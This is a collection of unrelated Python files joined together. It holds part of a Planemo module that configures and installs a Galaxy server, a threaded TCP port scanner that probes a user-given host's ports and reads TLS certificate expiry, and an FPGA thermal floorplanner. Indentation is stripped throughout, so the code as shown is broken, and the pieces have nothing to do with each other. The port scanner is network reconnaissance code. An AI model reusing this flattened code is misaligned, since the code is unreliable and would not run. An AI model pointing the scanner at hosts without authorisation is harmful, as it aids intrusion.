shutil.rmtree(self.config_directory, CLEANUP_IGNORE_ERRORS)
@property
def default_use_path_paste(self):
# If Planemo started a local, native Galaxy instance assume files URLs can be
# pasted.
return self.user_is_admin
def _database_connection(database_location, **kwds):
default_connection = DATABASE_LOCATION_TEMPLATE % database_location
database_connection = kwds.get("database_connection") or default_connection
return database_connection
def _find_galaxy_root(ctx, **kwds):
root_prop = "galaxy_root"
cwl = kwds.get("cwl", False)
if cwl:
root_prop = "cwl_galaxy_root"
galaxy_root = kwds.get(root_prop, None)
if galaxy_root:
return galaxy_root
else:
par_dir = os.getcwd()
while True:
run = os.path.join(par_dir, "run.sh")
config = os.path.join(par_dir, "config")
if os.path.isfile(run) and os.path.isdir(config):
return par_dir
new_par_dir = os.path.dirname(par_dir)
if new_par_dir == par_dir:
break
par_dir = new_par_dir
return None
def _find_test_data(runnables, **kwds):
test_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
test_data_search_path = runnables[0].test_data_search_path
# Find test data directory associated with path.
test_data = kwds.get("test_data", None)
if test_data:
return os.path.abspath(test_data)
else:
test_data = _search_tool_path_for(test_data_search_path, "test-data")
if test_data:
return test_data
warn(NO_TEST_DATA_MESSAGE)
return None
def _find_tool_data_table(runnables, test_data_dir, **kwds):
tool_data_search_path = "."
runnables = [r for r in runnables if r.has_tools]
if len(runnables) > 0:
tool_data_search_path = runnables[0].tool_data_search_path
tool_data_table = kwds.get("tool_data_table", None)
if tool_data_table:
return os.path.abspath(tool_data_table)
else:
extra_paths = [test_data_dir] if test_data_dir else []
return _search_tool_path_for(
tool_data_search_path,
"tool_data_table_conf.xml.test",
extra_paths,
) or _search_tool_path_for( # if all else fails just use sample
tool_data_search_path,
"tool_data_table_conf.xml.sample"
)
def _search_tool_path_for(path, target, extra_paths=None):
"""Check for presence of a target in different artifact directories."""
if extra_paths is None:
extra_paths = []
if not os.path.isdir(path):
tool_dir = os.path.dirname(path)
else:
tool_dir = path
possible_dirs = [tool_dir, "."] + extra_paths
for possible_dir in possible_dirs:
possible_path = os.path.join(possible_dir, target)
if os.path.exists(possible_path):
return os.path.abspath(possible_path)
return None
def _configure_sheds_config_file(ctx, config_directory, **kwds):
if "shed_target" not in kwds:
kwds = kwds.copy()
kwds["shed_target"] = "toolshed"
shed_target_url = tool_shed_url(ctx, **kwds)
contents = _sub(TOOL_SHEDS_CONF, {"shed_target_url": shed_target_url})
tool_sheds_conf = os.path.join(config_directory, "tool_sheds_conf.xml")
write_file(tool_sheds_conf, contents)
return tool_sheds_conf
def _tool_conf_entry_for(tool_paths):
tool_definitions = ""
for tool_path in tool_paths:
if os.path.isdir(tool_path):
tool_definitions += '''<tool_dir dir="%s" />''' % tool_path
else:
tool_definitions += '''<tool file="%s" />''' % tool_path
return tool_definitions
def _install_galaxy(ctx, galaxy_root, env, kwds):
if not kwds.get("no_cache_galaxy", False):
_install_galaxy_via_git(ctx, galaxy_root, env, kwds)
else:
_install_galaxy_via_download(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_download(ctx, galaxy_root, env, kwds):
branch = _galaxy_branch(kwds)
untar_to("https://codeload.github.com/galaxyproject/galaxy/tar.gz/" + branch, tar_args=['-xvzf', '-', 'galaxy-' + branch], dest_dir=galaxy_root)
_install_with_command(ctx, galaxy_root, env, kwds)
def _install_galaxy_via_git(ctx, galaxy_root, env, kwds):
gx_repo = _ensure_galaxy_repository_available(ctx, kwds)
branch = _galaxy_branch(kwds)
command = git.command_clone(ctx, gx_repo, galaxy_root, branch=branch)
exit_code = shell(command, env=env)
if exit_code != 0:
raise Exception("Failed to glone Galaxy via git")
_install_with_command(ctx, galaxy_root, env, kwds)
def _galaxy_branch(kwds):
branch = kwds.get("galaxy_branch", None)
if branch is None:
cwl = kwds.get("cwl", False)
branch = "cwl-1.0" if cwl else None
if branch is None:
branch = DEFAULT_GALAXY_BRANCH
return branch
def _galaxy_source(kwds):
source = kwds.get("galaxy_source", None)
if source is None:
cwl = kwds.get("cwl", False)
source = CWL_GALAXY_SOURCE if cwl else None
if source is None:
source = DEFAULT_GALAXY_SOURCE
return source
def _install_with_command(ctx, galaxy_root, env, kwds):
setup_venv_command = setup_venv(ctx, kwds)
install_cmd = shell_join(
setup_venv_command,
setup_common_startup_args(),
COMMAND_STARTUP_COMMAND,
)
exit_code = shell(install_cmd, cwd=galaxy_root, env=env)
if exit_code != 0:
raise Exception("Failed to install Galaxy via command [%s]" % install_cmd)
if not os.path.exists(galaxy_root):
raise Exception("Failed to create Galaxy directory [%s]" % galaxy_root)
if not os.path.exists(os.path.join(galaxy_root, "lib")):
raise Exception("Failed to create Galaxy directory [%s], lib missing" % galaxy_root)
def _ensure_galaxy_repository_available(ctx, kwds):
workspace = ctx.workspace
cwl = kwds.get("cwl", False)
galaxy_source = kwds.get('galaxy_source')
if galaxy_source and galaxy_source != DEFAULT_GALAXY_SOURCE:
sanitized_repo_name = "".join(c if c.isalnum() else '_' for c in kwds['galaxy_source']).rstrip()[:255]
gx_repo = os.path.join(workspace, "gx_repo_%s" % sanitized_repo_name)
else:
gx_repo = os.path.join(workspace, "gx_repo")
if cwl:
gx_repo += "_cwl"
if os.path.exists(gx_repo):
# Convert the git repository from bare to mirror, if needed
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.fetch', '+refs/*:refs/*'])
shell(['git', '--git-dir', gx_repo, 'config', 'remote.origin.mirror', 'true'])
# Attempt remote update - but don't fail if not interweb, etc...
shell("git --git-dir %s remote update >/dev/null 2>&1" % gx_repo)
else:
remote_repo = _galaxy_source(kwds)
command = git.command_clone(ctx, remote_repo, gx_repo, mirror=True)
shell(command)
return gx_repo
def _build_env_for_galaxy(properties, template_args):
env = {}
for key, value in iteritems(properties):
if value is not None: # Do not override None with empty string
var = "GALAXY_CONFIG_OVERRIDE_%s" % key.upper()
value = _sub(value, template_args)
env[var] = value
return env
def _build_test_env(properties, env):
# Keeping these environment variables around for a little while but
# many are probably not needed as of the following commit.
# https://bitbucket.org/galaxy/galaxy-central/commits/d7dd1f9
test_property_variants = {
'GALAXY_TEST_JOB_CONFIG_FILE': 'job_config_file',
'GALAXY_TEST_MIGRATED_TOOL_CONF': 'migrated_tools_config',
'GALAXY_TEST_TOOL_CONF': 'tool_config_file',
'GALAXY_TEST_FILE_DIR': 'test_data_dir',
'GALAXY_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
# Next line would be required for tool shed tests.
# 'GALAXY_TEST_TOOL_DEPENDENCY_DIR': 'tool_dependency_dir',
}
for test_key, gx_key in test_property_variants.items():
value = properties.get(gx_key, None)
if value is not None:
env[test_key] = value
def _handle_job_config_file(config_directory, server_name, kwds):
job_config_file = kwds.get("job_config_file", None)
if not job_config_file:
template_str = JOB_CONFIG_LOCAL
job_config_file = os.path.join(
config_directory,
"job_conf.xml",
)
docker_enable = str(kwds.get("docker", False))
docker_host = kwds.get("docker_host", docker_util.DEFAULT_HOST)
docker_host_param = ""
if docker_host:
docker_host_param = """<param id="docker_host">%s</param>""" % docker_host
conf_contents = Template(template_str).safe_substitute({
"server_name": server_name,
"docker_enable": docker_enable,
"require_container": "false",
"docker_sudo": str(kwds.get("docker_sudo", False)),
"docker_sudo_cmd": str(kwds.get("docker_sudo_cmd", docker_util.DEFAULT_SUDO_COMMAND)),
"docker_cmd": str(kwds.get("docker_cmd", docker_util.DEFAULT_DOCKER_COMMAND)),
"docker_host_param": docker_host_param,
})
write_file(job_config_file, conf_contents)
kwds["job_config_file"] = job_config_file
def _write_tool_conf(ctx, tool_paths, tool_conf_path):
tool_definition = _tool_conf_entry_for(tool_paths)
tool_conf_template_kwds = dict(tool_definition=tool_definition)
tool_conf_contents = _sub(TOOL_CONF_TEMPLATE, tool_conf_template_kwds)
write_file(tool_conf_path, tool_conf_contents)
ctx.vlog(
"Writing tool_conf to path %s with contents [%s]",
tool_conf_path,
tool_conf_contents,
)
def _handle_container_resolution(ctx, kwds, galaxy_properties):
if kwds.get("mulled_containers", False):
galaxy_properties["enable_beta_mulled_containers"] = "True"
involucro_context = build_involucro_context(ctx, **kwds)
galaxy_properties["involucro_auto_init"] = "False" # Use planemo's
galaxy_properties["involucro_path"] = involucro_context.involucro_bin
def _handle_job_metrics(config_directory, kwds):
metrics_conf = os.path.join(config_directory, "job_metrics_conf.xml")
with open(metrics_conf, "w") as fh:
fh.write(EMPTY_JOB_METRICS_TEMPLATE)
kwds["job_metrics_config_file"] = metrics_conf
def _handle_refgenie_config(config_directory, galaxy_root, kwds):
refgenie_dir = os.path.join(config_directory, 'refgenie')
_ensure_directory(refgenie_dir)
refgenie_config_file = os.path.join(refgenie_dir, "genome_config.yaml")
refgenie_config = get_refgenie_config(galaxy_root=galaxy_root, refgenie_dir=refgenie_dir)
with open(refgenie_config_file, "w") as fh:
fh.write(refgenie_config)
kwds["refgenie_config_file"] = refgenie_config_file
def _handle_kwd_overrides(properties, kwds):
kwds_gx_properties = [
'job_config_file',
'job_metrics_config_file',
'dependency_resolvers_config_file',
]
for prop in kwds_gx_properties:
val = kwds.get(prop, None)
if val:
properties[prop] = val
def _sub(template, args):
if template is None:
return ''
return Template(template).safe_substitute(args)
def _ensure_directory(path):
if path is not None and not os.path.exists(path):
os.makedirs(path)
__all__ = (
"DATABASE_LOCATION_TEMPLATE",
"galaxy_config",
)
|
__init__.py | import socket
import threading
import ssl
from queue import Queue
import time
q = Queue()
max_threads = 100
starting_port = 1
max_port = 445
secure_ports = [22, 443, 465, 993, 995]
print_errors = False
connection_timeout = 5.0
ports_failed = []
host = input("Enter host to check (example: www.google.com): ")
print("Checking ports \n")
start_time = time.time()
def port_scan(port):
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connection = socket.create_connection((host, port), timeout=connection_timeout)
with threading.Lock():
print('Port', port, 'is open on', host)
if port in secure_ports:
cert_result = check_certificate(connection, port)
print("Certificate expires:", cert_result['notAfter'])
connection.close()
except Exception as e:
with threading.Lock():
ports_failed.append("Port {} responded: {}".format(str(port), e))
def check_certificate(connection, port):
cert_context = ssl.create_default_context()
with cert_context.wrap_socket(connection, server_hostname=host) as cert:
return cert.getpeercert()
def threader():
while True:
worker = q.get()
port_scan(worker)
q.task_done()
for idx in range(max_threads):
threads = threading.Thread(target=threader)
threads.daemon = True
threads.start()
for worker in range(starting_port, max_port):
q.put(worker)
q.join()
if print_errors:
for error in ports_failed:
print(error)
print("Scan took %.2f seconds" % (time.time() - start_time))
|
floorplanner.py | #!/usr/bin/env python3
""" author: Jianqi Chen """
import sys, os, svgwrite, random, copy, numpy, getopt, re, threading, multiprocessing, json, datetime, itertools
from queue import Queue
from SlicingTree import STree
s_floorplan = None # the slicing tree, just remember it's a global variable
PROCESS_MAX = 5 # Maximal number of processes for RunHotSpot() and ModuleIRLGen()
colormap = {'LAB':'blue','RAM':'orange','DSP':'red'}
asp_max = 3.5 # maximum aspect ratio for a single module, minimum is 1/asp_max
alpha = 1 # for intermediate floorplans, maximum area is (alpha*WIDTH) * (alpha*HEIGHT), 1<=alpha<=2
temp_am = 310 #ambient temperature for HotSpot
leaf_IRL = {} #IRL of leaves (functional modules), usually only generate once for given resource/module files
history_record = {} #stores slicing trees and their cost that are evaluated
final_result = None #[max_temperature,[(mod_name1,[x,y,w,h]),(mod_name2,[x,y,w,h])...]]
# coefficients in SA's cost function: cost = ( aaa*temp_max + bbb*tot_ap + ccc*tot_wl ) * ( 0.2*area_ex/(WIDTH*HEIGHT) + 1)
aaa = 2#0.2
bbb = 0.1
ccc = 0.0005#0.002
# coefficients in MCG's cost functional: cost = mcg_alpha*BoundingArea + mcg_beta*sum{sqrt(mod_area_self*mod_area_other)/(dist*(power_density difference + mcg_const))}
mcg_alpha = 0.97
mcg_beta = 0.03
mcg_const = 0.05
# use sa-based floorplanner or mcg-based
sa_flg = False
mcg_flg = False
def usage():
print("To run the program for [design_name], [design_name].module and [design_name].res should be provided. Then enter:")
print("\t./floorplanner.py -t [floorplanner_type] [design_name]")
print("design_name = 'test' by default")
print("floorplanner_type can be 'sa' for simulated annealing or 'mcg' for modified cluster growth")
def main():
print('Floorplanning starting at '+str( datetime.datetime.now() ))
# Draw empty floorplan
DrawFloorplan('./output_files/empty_floorplan.svg',[])
print ('sa:',sa_flg)
print ('mcg:',mcg_flg)
if sa_flg:
# set alpha value
PreEstimate()
# floorplanning using simulated annealing
mod_loc_list = FloorplaningSA()
if mcg_flg:
# floorplanning using cluster growth
FloorplaningMCG()
print('Finishing at '+str( datetime.datetime.now() ))
# handle command line arguments by setting global variables
def SetGlobalVar(argv):
global design_name, aaa, bbb, ccc, mcg_alpha, mcg_beta, mcg_const, sa_flg, mcg_flg, PROCESS_MAX
os.system('mkdir -p output_files')
os.system('chmod 744 ./hotspot/hotspot ./hotspot/grid_thermal_map.pl')
# Output file
if not os.path.isdir('./output_files/json'):
os.system('mkdir ./output_files/json')
with open('./output_files/json/final_result','w') as json_file:
json.dump(final_result, json_file)
try:
opts, args = getopt.getopt(argv,'ht:',['help','sa_a=','sa_b=','sa_c=','mcg_a=','mcg_b=','mcg_c=','type=','process_limit='])
except getopt.GetoptError:
usage()
sys.exit(1)
print('opts:',opts)
print('args:',args)
for opt, arg in opts:
if opt in ('-h','--help'):
usage()
sys.exit(0)
elif opt == '--sa_a':
aaa = float(arg)
elif opt == '--sa_b':
bbb = float(arg)
elif opt == '--sa_c':
ccc = float(arg)
elif opt == '--mcg_a':
mcg_alpha = float(arg)
elif opt == '--mcg_b':
mcg_beta = float(arg)
elif opt == '--mcg_c':
mcg_const = float(arg)
elif opt in ('-t','--type'):
if arg == 'sa':
sa_flg = True
elif arg == 'mcg':
mcg_flg = True
else:
usage()
sys.exit(2)
elif opt == '--process_limit':
PROCESS_MAX = int(arg)
else:
usage()
sys.exit(2)
if len(args) > 1:
usage()
sys.exit(2)
elif len(args) == 1:
design_name = args[0]
def PreEstimate():
global alpha
cell_type = list( map(lambda p: p[0],res_cells) )
usage_ratio = []
for res in resource:
count_a = cell_type.count(res) #number of available resources
count_n = 0 #number of resources needed
for mod in module_list:
count_n += module_list[mod][0][res]
ratio_u = count_n/count_a
usage_ratio.append(ratio_u)
key_ratio = max(usage_ratio)
if key_ratio > 0.86:
print('Not enough FPGA resources')
sys.exit(0)
elif key_ratio > 0.8:
alpha = 1.5
elif key_ratio > 0.5:
alpha = 1.4
elif key_ratio > 0.4:
alpha = 1.25
elif key_ratio > 0.3:
alpha = 1.1
else:
alpha = 1
# check whether the cell is inside the rectangle
# (cx,cy): coordinate of the cell, every cell's (x,y) actually represents 4 cells
# e.g. cx=1, cy=3, the four cells' location: (1,3),(WIDTH+1,3),(1,HEIGHT+3),(WIDTH+1,HEIGHT+3)
# cw: cell width, ch: cell height, (rx,ry):left bottom coordinate of rectangle, rw: rect width, rh: rect height
def CellInRect(cx,cy,cw,ch,rx,ry,rw,rh):
#upper right coordinate
cx1 = cx+cw-1
cy1 = cy+ch-1
rx1 = rx+rw-1
ry1 = ry+rh-1
count = 0
if cx >= rx and cy >= ry and cx1 <= rx1 and cy1 <= ry1:
count += 1
if (cx+WIDTH) >= rx and cy >= ry and (cx1+WIDTH) <= rx1 and cy1 <=ry1:
count += 1
if cx >= rx and (cy+HEIGHT) >= ry and cx1 <= rx1 and (cy1+HEIGHT) <= ry1:
count += 1
if (cx+WIDTH) >= rx and (cy+HEIGHT) >= ry and (cx1+WIDTH) <= rx1 and (cy1+HEIGHT) <= ry1:
count += 1
return count
# irreducible realization list(IRL) generation for a single module, at a single location
# x,y is the coordinate of the left bottom corner, mod_res is a dict of resource required e.g. {'lAB':12,'RAM':1}
# return a list of rectangle r = (x,y,w,h), w=width, h=height
def SingleIRLGen(x,y,mod_res):
v_WIDTH = int(alpha*WIDTH) #virtual width of the whole floorplanning area
v_HEIGHT = int(alpha*HEIGHT)
IRL = [] #irreducible realization list
#start searching from a square
s_width = 1
while True:
check_list = [False for i in range(len(mod_res))]
i = 0
for res in mod_res:
cell_w = resource[res][0] #cell width
cell_h = resource[res][1] #cell height
count = 0
res_cells_useful = filter(lambda p: p[0] == res and p[1]>=x and p[2]>=y, res_cells)
for cell in res_cells_useful:
count += CellInRect(cell[1],cell[2],cell_w,cell_h,x,y,s_width,s_width)
if count >= mod_res[res]:
check_list[i] = True
i += 1
else:
break
if False not in check_list:
IRL.append( (x,y,s_width,s_width) )
rm_flg = True
break
elif (x + s_width) <= v_WIDTH and (y + s_width) <= v_HEIGHT:
s_width += 1
else:
break
#searching for a long rectangle (width>height)
l_height = s_width - 1
l_width = s_width
while l_height >= 1:
while l_width/l_height < asp_max and (x + l_width) <= v_WIDTH:
check_list = [False for i in range(len(mod_res))]
i = 0
for res in mod_res:
cell_w = resource[res][0] #cell width
cell_h = resource[res][1] #cell height
count = 0
res_cells_useful = filter(lambda p: p[0] == res and p[1]>=x and p[2]>=y, res_cells)
for cell in res_cells_useful:
count += CellInRect(cell[1],cell[2],cell_w,cell_h,x,y,l_width,l_height)
if count >= mod_res[res]:
check_list[i] = True
i += 1
else:
break
if False not in check_list:
if rm_flg:
IRL.pop()
IRL.append( (x,y,l_width,l_height) )
rm_flg = True
break
else:
l_width += 1
rm_flg = False
if (x + l_width) > v_WIDTH:
break
l_height -= 1
#searching for a tall rectangle (width<height)
t_height = s_width
t_width = s_width - 1
while t_width >= 1:
while t_height/t_width < asp_max and (y + t_height) <= v_HEIGHT:
check_list = [False for i in range(len(mod_res))]
i = 0
for res in mod_res:
cell_w = resource[res][0] #cell width
cell_h = resource[res][1] #cell height
count = 0
res_cells_useful = filter(lambda p: p[0] == res and p[1]>=x and p[2]>=y, res_cells)
for cell in res_cells_useful:
count += CellInRect(cell[1],cell[2],cell_w,cell_h,x,y,t_width,t_height)
if count >= mod_res[res]:
check_list[i] = True
i += 1
else:
break
if False not in check_list:
if rm_flg:
IRL.pop()
IRL.append( (x,y,t_width,t_height) )
rm_flg = True
break
else:
t_height += 1
rm_flg = False
if (y + t_height) > v_HEIGHT:
break
t_width -= 1
return IRL
# IRL generation for a single module at all possible locations
# IRL belongs to {r=(x,y,w,h)|x>0,y>0,x+w<alpha*WIDTH,y+h<alpha*HEIGHT}
# mod_res is a dict of resource required e.g. {'lAB':12,'RAM':1}
# store the IRL in a list
def ModuleIRLGen(mod_res, mod_name):
sema_irlgen.acquire()
IRL = []
for x in range(int(alpha*WIDTH)):
for y in range(int(alpha*HEIGHT)):
IRL += SingleIRLGen(x,y,mod_res)
if not os.path.isdir('./output_files/json'):
os.system('mkdir ./output_files/json')
irl_dict = {mod_name: IRL}
with open('./output_files/json/'+mod_name+'_IRL','w') as json_file:
json.dump(irl_dict, json_file)
sema_irlgen.release()
return IRL
# Generate all IRL for leaves of the slicing tree, using multiprocessing
def AllLeavesIRLGen():
global leaf_IRL
mod_names = list(module_list)
os.system('mkdir -p ./output_files/json')
print('Generating irreducible realization list for all modules')
process_list = []
for mod_n in mod_names:
t = multiprocessing.Process( target = ModuleIRLGen, args = (module_list[mod_n][0], mod_n) )
process_list.append(t)
for process in process_list:
process.start()
for process in process_list:
process.join()
for mod_n in mod_names:
with open('./output_files/json/'+mod_n+'_IRL','r') as f:
new_IRL = json.load(f)
leaf_IRL.update(new_IRL)
# get IRL for 'V' node(vertical slicing), given (x,y), IRL of left/right child
# returned list: [(IRL of the v node, rectangles of each module which is a descendant of the v node)]
# e.g. [( (1,2,4,4),[('jpeg',(1,2,2,2)),('fir',(3,4,2,2))] ),(...)]
def VGetIRL(x,y,l_IRL, r_IRL):
v_IRL = [] #return list
ll_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==y, l_IRL))
ll_IRL.sort(key=lambda p: p[0][2]) #sort according to width
for i in range(len(ll_IRL)):
l_w = ll_IRL[i][0][2]
l_h = ll_IRL[i][0][3]
l_mod_use = ll_IRL[i][1]
if i == 0:
l_h1 = alpha*HEIGHT
else:
l_h1 = ll_IRL[i-1][0][3]#upperbound for right child's height
rr_IRL = list(filter(lambda p: p[0][0]==(x+l_w) and p[0][1]==y and p[0][3]<l_h1, r_IRL))
rr_IRL.sort(key=lambda p: p[0][2])
for j in range(len(rr_IRL)):
r_w = rr_IRL[j][0][2]
r_h = rr_IRL[j][0][3]
r_mod_use = rr_IRL[j][1]
w_new = l_w + r_w
h_new = max(l_h,r_h)
v_IRL.append( ((x,y,w_new,h_new), l_mod_use + r_mod_use) )
if r_h <= l_h:
break
return v_IRL
# get IRL for 'H' node(horizontal slicing), given (x,y), left child is at bottom, right child top
def HGetIRL(x,y,l_IRL, r_IRL):
h_IRL = [] #return list
ll_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==y, l_IRL))
ll_IRL.sort(key=lambda p: p[0][2]) #sort according to width
for i in range(len(ll_IRL)):
l_w = ll_IRL[i][0][2]
l_h = ll_IRL[i][0][3]
l_mod_use = ll_IRL[i][1]
if i == len(ll_IRL)-1:
l_w1 = alpha*WIDTH
else:
l_w1 = ll_IRL[i+1][0][2]#upperbound for right child's width
rr_IRL = list(filter(lambda p: p[0][0]==x and p[0][1]==(y+l_h) and p[0][2]<l_w1, r_IRL))
rr_IRL.sort(key=lambda p: p[0][2])
for j in reversed(range(len(rr_IRL))):
r_w = rr_IRL[j][0][2]
r_h = rr_IRL[j][0][3]
r_mod_use = rr_IRL[j][1]
w_new = max(l_w,r_w)
h_new = l_h + r_h
h_IRL.append( ((x,y,w_new,h_new), l_mod_use + r_mod_use) )
if r_w <= l_w:
break
return h_IRL
# usually input the index of root node when call this function, which is always 0.
# Then get IRL for all nodes in the slicing tree
def EvaluateNode(index):
global leaf_IRL
# for leaves
if s_floorplan.slicing_tree[index].l == None and s_floorplan.slicing_tree[index].r == None:
mod_name = s_floorplan.slicing_tree[index].t
mod_res = module_list[ mod_name ][0]
if mod_name in leaf_IRL: #IRL already calculated
IRL_tmp = leaf_IRL[mod_name]
else: #leaf_IRL does not have the IRL
leaf_IRL[mod_name] = ModuleIRLGen(mod_res, mod_name)
IRL_tmp = leaf_IRL[mod_name]
s_floorplan.slicing_tree[index].IRL = [ (x,[(mod_name,x)]) for x in IRL_tmp]
return
EvaluateNode(s_floorplan.slicing_tree[index].l - 1)
EvaluateNode(s_floorplan.slicing_tree[index].r - 1)
IRL = []
left_child_IRL = s_floorplan.slicing_tree[ s_floorplan.slicing_tree[index].l - 1 ].IRL
right_child_IRL = s_floorplan.slicing_tree[ s_floorplan.slicing_tree[index].r - 1 ].IRL
if s_floorplan.slicing_tree[index].t == 'V':
for x in range(int(alpha*WIDTH)):
for y in range(int(alpha*HEIGHT)):
IRL += VGetIRL(x,y,left_child_IRL,right_child_IRL)
elif s_floorplan.slicing_tree[index].t == 'H':
for x in range(int(alpha*WIDTH)):
for y in range(int(alpha*HEIGHT)):
IRL += HGetIRL(x,y,left_child_IRL,right_child_IRL)
s_floorplan.slicing_tree[index].IRL = IRL
# generate floorplan file for thermal simulator HotSpot
# module_loc_list = [(mod_name1,(x,y,w,h)),(mod_name2..)..], folder is the name of ./hotspot/folder, can be empty string
def FLPgen(module_loc_list,folder):
# how long is 1 unit width in IRLs
cell_width = 0.0001
cell_height = 0.0001
flp_file = open('./hotspot/'+folder+'/'+design_name+'.flp','w')
flp_file.write('root\t'+str( WIDTH*cell_width )+'\t'+str( HEIGHT*cell_height )+'\t0\t0\n')
for mod in module_loc_list:
width = str(mod[1][2]*cell_width)
height = str(mod[1][3]*cell_height)
left_x = str(mod[1][0]*cell_width)
bottom_y = str(mod[1][1]*cell_height)
flp_file.write(mod[0]+'\t'+width+'\t'+height+'\t'+left_x+'\t'+bottom_y+'\n')
flp_file.close()
# generate power trace file for thermal simulator HotSpot
# mod_list should have the same format of the module_list in file test.module
def PTRACEgen(mod_list, root_power,folder):
ptrace_file = open('./hotspot/'+folder+'/'+design_name+'.ptrace','w')
name = 'root' #first line
power = str(root_power/1000) #second line
for mod in mod_list:
name += '\t'
name += mod
power += '\t'
power += str( mod_list[mod][1]/1000 ) #unit: Watt
ptrace_file.write(name+'\n'+power+'\n')
ptrace_file.close()
# generate flp and ptrace file from module_list and IRL. root_power is static power of the whole floorplanning area(unit: mW)
# run HotSpot and get thermal map file [design_name].grid.steady as output
def RunHotSpot(module_loc_list, root_power, folder):
global sema_hotspot
sema_hotspot.acquire()
FLPgen(module_loc_list, folder)
PTRACEgen(module_list, root_power, folder)
os.system('cd hotspot && ./hotspot -c hotspot.config -f ./'+folder+'/'+design_name+'.flp -p ./'+folder+'/'+design_name+'.ptrace -steady_file ./'+folder+'/'+design_name+'.steady -model_type grid -grid_steady_file ./'+folder+'/'+design_name+'.grid.steady > /dev/null 2>%1')
sema_hotspot.release()
# read [design_name].grid.steady and return the highest temperature(unit: Kelvin)
def ReadTempMax(folder):
thermal_map = open('./hotspot/'+folder+'/'+design_name+'.grid.steady','r')
temperature_str = re.findall(r'\d{3}\.\d{2}', thermal_map.read() )
thermal_map.close()
temperature = map(float, temperature_str)
max_temp = max(temperature)
return max_temp
# given the location of every module[(mod_name,(x,y,w,h)),(..).], return total interconnection wire length = sum( Manhattan distance between block centers)
def TotalWireLen(module_loc_list):
mod_loc_dict = {}
# read the list into a dict, and only store the center location
for mod_loc in module_loc_list:
mod_loc_dict[ mod_loc[0] ] = (mod_loc[1][0]+mod_loc[1][2]/2, mod_loc[1][2]+mod_loc[1][3]/2)
wl_sum = 0
for mod in module_list: #module_list is the global variable in .module file_name
center1 = mod_loc_dict[mod]
for other_mod in module_list[mod][2]:
center2 = mod_loc_dict[other_mod]
wire_num = module_list[mod][2][other_mod]
wl_sum += wire_num * ( abs(center1[0]-center2[0]) + abs(center1[1]-center2[1]) )
wl_sum = wl_sum/2 #actually calculated twice above
return wl_sum
# given the location of every module[(mod_name,(x,y,w,h)),(..).], return aspect ratio sum = sum( longer side length/shorter side length of all blocks), this a metric for internal wire length
def RatioSum(module_loc_list):
r_sum = 0
for mod_loc in module_loc_list:
ap_ratio = max( [ mod_loc[1][2]/mod_loc[1][3], mod_loc[1][3]/mod_loc[1][2] ] )
r_sum += ap_ratio
return r_sum
# floorplanning algorithm based on Simulated Annealing
def FloorplaningSA():
global s_floorplan
global leaf_IRL
global history_record
global final_result
# acceptance probability
def accept_prob(old_cost, new_cost, T):
return numpy.exp( (old_cost-new_cost)/T )
# cost function, area_ex - area exceeds WIDTH*HEIGHT, temp_max - max temperature(in Kelvin), tot_wl - total external interconnection wire length, tot_ap - aspect ratio sum of all modules
def cost_func(area_ex, temp_max, tot_ap, tot_wl):
cost = cost = ( aaa*temp_max + bbb*tot_ap + ccc*tot_wl ) * ( 0.2*area_ex/(WIDTH*HEIGHT) + 1)
return cost
# calculate IRL of root node
def new_floorplan():
global s_floorplan
global history_record
nonlocal max_tp
nonlocal best_cost
nonlocal best_fp
nonlocal best_temp_max
# if the slicing tree is evaluated before
cur_polish = ' '.join( s_floorplan.Polish() )
if cur_polish in history_record:
return history_record[cur_polish]
# slicing tree not evaluated before
EvaluateNode(0)
useful_floorplan = list(map(lambda p: (p[0][0]+p[0][2])<=WIDTH and (p[0][1]+p[0][3])<=HEIGHT, s_floorplan.slicing_tree[0].IRL))
if s_floorplan.slicing_tree[0].IRL:
ex_root_area = [] # area exceeds WIDTH*HEIGHT
thread_list = [] # mutithreading for RunHotSpot
temp_max_list = [] # maximal temperature from HotSpot
total_ratio = [] # aspect ratio rum of all modules
total_wirelen = [] # total length of external interconnection wire between modules
cost_list = []
for IR in s_floorplan.slicing_tree[0].IRL:
if (IR[0][0]+IR[0][2] > WIDTH) and (IR[0][1]+IR[0][3] <= HEIGHT):
area_exceed = IR[0][3] * (IR[0][0]+IR[0][2]-WIDTH)
elif (IR[0][0]+IR[0][2] <= WIDTH) and (IR[0][1]+IR[0][3] > HEIGHT):
area_exceed = IR[0][2] * (IR[0][1]+IR[0][3]-HEIGHT)
elif (IR[0][0]+IR[0][2] > WIDTH) and (IR[0][1]+IR[0][3] > HEIGHT):
area_exceed = IR[0][2]*IR[0][3] - (WIDTH-IR[0][0])*(HEIGHT-IR[0][1])
else:
area_exceed = 0
ex_root_area.append(area_exceed)
total_wirelen.append( TotalWireLen(IR[1]) )
total_ratio.append( RatioSum(IR[1]) )
cur_index = s_floorplan.slicing_tree[0].IRL.index(IR)
os.system('mkdir -p ./hotspot/'+str(cur_index))
if area_exceed == 0:
t = threading.Thread( target = RunHotSpot, args = (IR[1],0,str(cur_index)) )
thread_list.append(t)
for thread in thread_list:
thread.start()
for thread in thread_list:
thread.join()
for i in range(len(useful_floorplan)):
if useful_floorplan[i] == True:
t_max = ReadTempMax(str(i))
if t_max > max_tp:
max_tp = t_max
temp_max_list.append(t_max)
else:
if max_tp == 0:
temp_max_list.append(315)
else:
temp_max_list.append(max_tp)
for i in range(len(temp_max_list)):
cur_max_temp = temp_max_list[i]
area_exceed = ex_root_area[i]
ratio_sum = total_ratio[i]
wire_length = total_wirelen[i]
cost_list.append( cost_func(area_exceed, cur_max_temp, ratio_sum, wire_length) )
cost = min(cost_list)
else:
cost = 999
if 1 in useful_floorplan: #if there is floorplan fits the real maximum area
for i, useful in enumerate(useful_floorplan):
if useful == True:
real_cost = cost_list[i]
if real_cost < best_cost:
best_cost = real_cost
best_temp_max = temp_max_list[i]
best_fp = s_floorplan.slicing_tree[0].IRL[i]
history_record[cur_polish] = cost
return cost
mod_names = list(module_list)
# generate IRL for leaves (modules)
AllLeavesIRLGen()
s_floorplan = STree(mod_names) #ramdom slicing tree, nodes have (t,p,l,r), no (x,y,w,h)
print(s_floorplan)#for debug
polish_exp = ' '.join( s_floorplan.Polish() )
print('0.Polish Expression: '+polish_exp)
max_tp = 0
# s_floorplan.M3()
best_cost = 999
best_temp_max = temp_am
best_fp = ()
T = 1.0 # temperature
